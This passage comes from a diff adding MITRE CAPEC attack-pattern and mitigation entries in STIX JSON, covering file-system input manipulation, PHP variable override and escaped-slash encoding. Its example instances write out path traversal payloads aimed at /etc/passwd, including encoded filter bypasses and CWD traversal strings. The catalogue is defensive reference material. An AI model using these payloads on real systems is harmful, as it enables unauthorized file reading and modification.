"attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Integrity monitoring for configuration files", + "id": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3b76047-8e3c-4ad6-890e-ee9b51ab15c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa2dbad2-1557-43ad-8ca5-6e87d044a038", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Enforce audit logging on code and configuration promotion procedures.", + "id": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f6c14a3-09ae-4833-b73c-17e14fa0ab03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--544a1da1-171a-4152-aaf8-cafc91c6ffcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD", + "id": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-75-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f3ed3dd-3d16-41fa-9408-5e346f652fed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47fcab1d-3b96-49c9-ba5c-28f7cc396ddc", + "spec_version": "2.1", + "target_ref": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.", + "external_references": [ + { + "external_id": "CAPEC-76", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/76.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating Web Input to File System Calls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user

    3. Techniques
    Spider web sites for all available links, entry points to the web site.
    Manually explore application and inventory all application inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

    2. Techniques
    Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)
    Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests
    Inject context-appropriate malicious file system control syntax

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

    2. Techniques
    The attacker injects context-appropriate malicious file path to access the content of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.
    The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.
    The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.
    The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Program must allow for user controlled variables to be applied directly to the filesystem" + ], + "x_capec_skills_required": { + "Low": "To identify file system entry point and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--418adbc1-d3a0-4e06-b39d-4a47ced3edbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure all input is validated, and does not contain file system commands", + "id": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--33951a4d-6ab2-4bdb-854f-4f2794baa0aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5606d417-4865-4533-8deb-e39c901f209e", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7822e43d-f894-41ac-88d5-41b2c0b4ef6e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.", + "id": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-76-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--80063d3f-3b3f-4552-bbbe-499aabc86961", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e8c9442-1e01-4fc2-9f90-b009bf6612fa", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d2b1d3bb-89ce-4615-be0c-c35eed6ad012", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.", + "external_references": [ + { + "external_id": "CAPEC-77", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-473", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Artur Maj, Securing PHP: Step-by-Step, 2003--06---22, Security Focus", + "external_id": "REF-520", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1706" + }, + { + "description": "Clancy Malcolm, Ten Security Checks for PHP, Part 1, 2003--03---20", + "external_id": "REF-521", + "source_name": "reference_from_CAPEC" + }, + { + "description": "PHP Manual, The PHP Group", + "external_id": "REF-522", + "source_name": "reference_from_CAPEC", + "url": "http://www.php.net/manual/en/security.globals.php" + } + ], + "id": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating User-Controlled Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an adversary can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An adversary can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the adversary can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on.

Experiment

  1. Find user-controlled variables: Using the information found by probing the application, the adversary attempts to manipulate many user-controlled variables and observes the effects on the application. If the adversary notices any significant changes to the application, they will know that a certain variable is useful to the application.

    2. Techniques
    Adversaries will try to alter many common variable names such as \"count\", \"tempFile\", \"i\", etc. The hope is that they can alter the flow of the application without knowing the inner-workings.
    Adversaries will try to alter known environment variables.

Exploit

  1. Manipulate user-controlled variables: Once the adversary has found a user-controller variable(s) that is important to the application, they will manipulate it to change the normal behavior in a way that benefits the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "attack-pattern--a506984b-0870-42d9-8bcd-0787f13b8c2e" + ], + "x_capec_prerequisites": [ + "A variable consumed by the application server is exposed to the client.", + "A variable consumed by the application server can be overwritten by the user.", + "The application server trusts user supplied data to compute business logic.", + "The application server does not perform proper input validation." + ], + "x_capec_skills_required": { + "Low": "The malicious user can easily try some well-known global variables and find one which matches.", + "Medium": "The adversary can use automated tools to probe for variables that they can control." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--593062e2-612e-46ce-8739-0d2b1b15f720", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.", + "id": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d6ce1ff-fa90-41cf-86a8-911f793e6838", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c40eaa0-2cde-4309-b3c3-79aebcc2ada3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use encapsulation when declaring your variables. This is to lower the exposure of your variables.", + "id": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3e969df-fa7a-479d-ba25-c6b31da5cffa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should be rejected by the program.", + "id": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6076ab-c2e1-428a-8d0f-b7f0642e9811", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "external_id": "CAPEC-78", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

    2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

